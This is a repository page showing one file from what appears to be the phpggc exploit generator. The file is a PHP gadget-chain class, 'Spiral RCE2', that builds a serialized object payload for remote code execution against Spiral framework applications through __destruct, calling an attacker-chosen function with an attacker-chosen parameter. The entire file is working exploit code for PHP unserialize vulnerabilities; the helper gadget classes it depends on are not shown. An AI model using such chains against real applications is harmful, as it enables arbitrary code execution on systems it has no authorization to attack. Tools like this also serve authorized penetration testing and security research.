Codebase list phpggc / c50af329-ea4e-40c8-8d03-d8644662fc21/upstream/0.20221129 gadgetchains / Spiral / RCE / 2 / chain.php
c50af329-ea4e-40c8-8d03-d8644662fc21/upstream/0.20221129

Tree @c50af329-ea4e-40c8-8d03-d8644662fc21/upstream/0.20221129 (Download .tar.gz)

chain.php @c50af329-ea4e-40c8-8d03-d8644662fc21/upstream/0.20221129raw · history · blame

<?php

namespace GadgetChain\Spiral;

class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
    public static $version = '-2.8+';
    public static $vector = '__destruct';
    public static $author = 'CyanM0un';
    public static $information = 'execute the function and throw an error';

    public function generate(array $parameters)
    {
        $function = $parameters['function'];
        $parameter = $parameters['parameter'];

        return new \App\App($function,$parameter);
    }
}